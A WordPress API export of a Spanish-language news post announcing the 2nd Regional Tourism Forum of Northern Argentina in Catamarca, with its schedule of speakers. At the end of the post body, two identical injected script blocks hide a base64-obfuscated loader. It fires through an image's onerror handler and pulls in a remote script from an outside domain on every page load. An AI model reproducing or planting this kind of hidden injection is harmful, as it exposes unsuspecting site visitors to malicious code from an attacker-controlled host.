{"id":4359,"date":"2024-08-28T09:33:42","date_gmt":"2024-08-28T12:33:42","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4359"},"modified":"2025-08-13T23:49:42","modified_gmt":"2025-08-14T02:49:42","slug":"destacados-expositores-formaran-parte-del-2o-foro-regional-de-turismo-del-norte","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4359","title":{"rendered":"Destacados expositores formar\u00e1n parte del 2\u00ba Foro Regional de Turismo del Norte"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-7939fb5b2ac70cfe9538bb7b91133a41\" style=\"background-color:#056399\"><em>Ser\u00e1 el jueves 5 de septiembre bajo el lema \u201cExplorando nuevas oportunidades y desaf\u00edos para la regi\u00f3n\u201d. Las inscripciones son sin cargo y ya se encuentran abiertas en la web del evento.<\/em><\/h4>\n\n\n\n<p>El pr\u00f3ximo jueves 5 de septiembre en el Predio Ferial de la vecina provincia de Catamarca se llevar\u00e1 adelante el 2\u00ba Foro Regional de Turismo del Norte. El primer encuentro fue el a\u00f1o pasado en Salta, con m\u00e1s de dos mil participantes.<\/p>\n\n\n\n<p>Esta nueva edici\u00f3n dar\u00e1 continuidad a este evento que inici\u00f3 en 2023 en Salta, reuniendo a los actores tur\u00edsticos del Norte argentino con el objetivo de promover la llegada de turistas internacionales a la regi\u00f3n. Este a\u00f1o, bajo el lema \u201cExplorando nuevas oportunidades y desaf\u00edos para la regi\u00f3n\u201d &nbsp;la conversaci\u00f3n continuar\u00e1 con el abordaje de tem\u00e1ticas relacionadas al desarrollo de experiencias tur\u00edsticas sostenibles de gesti\u00f3n integrada, posicionamiento y comercializaci\u00f3n del destino norte.<\/p>\n\n\n\n<p>Durante el evento disertar\u00e1n reconocidos disertantes de nivel nacional e internacional que presentar\u00e1n enfoques innovadores para pensar y repensar el turismo en la regi\u00f3n, sobre promoci\u00f3n de turismo de cara al mercado internacional, dise\u00f1o de experiencias tur\u00edsticas, inteligencia artificial aplicada al turismo y estrategias de marketing, liderazgo y trabajo en equipo.<\/p>\n\n\n\n<p>El presidente del Ente Norte,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, sostuvo que \u201ccomo regi\u00f3n continuar con este segundo Foro es un desaf\u00edo, pretendemos que todos los emprendedores tur\u00edsticos participen; estamos muy satisfechos porque estamos superando los 1500 inscriptos de 15 provincias\u201d por otra parte, se\u00f1al\u00f3 que \u201cinvolucrarse en las tem\u00e1ticas permite el desarrollo junto al sector privado del Norte argentino\u201d.<\/p>\n\n\n\n<p>\u201cEstamos muy contentos de recibir este gran evento en Catamarca, en el que esperamos a m\u00e1s de 2.000 asistentes\u201d, se\u00f1al\u00f3 la secretaria de Gesti\u00f3n Tur\u00edstica de Catamarca, Evangelina Quar\u00edn; al tiempo que explic\u00f3 \u201celegimos la tem\u00e1tica por todo lo que venimos trabajando en conjunto con la regi\u00f3n para posicionarnos como un destino\u201d.<\/p>\n\n\n\n<p>La participaci\u00f3n es sin cargo y est\u00e1 destinada a profesionales de la industria tur\u00edstica, actores p\u00fablicos y privados, emprendedores, referentes empresariales y estudiantes de las provincias del NOA Catamarca, Jujuy, La Rioja, Salta, Santiago del Estero y Tucum\u00e1n. La invitaci\u00f3n est\u00e1 abierta tambi\u00e9n a asistentes de otras provincias y pa\u00edses lim\u00edtrofes.<\/p>\n\n\n\n<p>Por inscripciones en el siguiente link&nbsp;<a href=\"https:\/\/fororegionalnorte.gob.ar\/\">https:\/\/fororegionalnorte.gob.ar\/<\/a><\/p>\n\n\n\n<p><strong>El Programa<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>8.30 Acreditaciones<\/li>\n\n\n\n<li>9.00 Acto de apertura<\/li>\n\n\n\n<li>9.40 Patricia Ruiz \u201cDise\u00f1o de experiencias tur\u00edsticas\u201d<\/li>\n\n\n\n<li>10.20 Marco Rosi \u201cInteligencia Artificial y su impacto en el turismo\u201d<\/li>\n\n\n\n<li>11.00 Coffe Break<\/li>\n\n\n\n<li>11.30 Joan Cwaik \u201cHabilidades para recuperar lo humano\u201d<\/li>\n\n\n\n<li>12.30 Almuerzo Libre<\/li>\n\n\n\n<li>13.50 Juli\u00e1n Gaita Gonzalez \u201cLos secretos detr\u00e1s de la magia\u201d<\/li>\n\n\n\n<li>14.30 Panel \u201cEstrategias de Promoci\u00f3n Tur\u00edstica Internacional en entornos digitales\u201d: Ana Clara Azurra (Inprotur), Morgan Mirabal y Vale en Argentina. Modera Florencia Sosa<\/li>\n\n\n\n<li>15.30 Juli\u00e1n Gaita Gonz\u00e1lez \u201cProhibido cerrar ventas\u201d<\/li>\n\n\n\n<li>16.10 Sergio Oveja Hern\u00e1ndez \u201cHerramientas para liderar y trabajar en equipo\u201d<\/li>\n\n\n\n<li>17.00 Cierre<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 el jueves 5 de septiembre bajo el lema \u201cExplorando nuevas oportunidades y desaf\u00edos para la regi\u00f3n\u201d. Las inscripciones son sin cargo y ya se encuentran abiertas en la web del evento. El pr\u00f3ximo jueves 5 de septiembre en el Predio Ferial de la vecina provincia de Catamarca se llevar\u00e1 adelante el 2\u00ba Foro Regional [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4360,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-4359","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4359"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4359"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4359\/revisions"}],"predecessor-version":[{"id":6697,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4359\/revisions\/6697"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4360"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}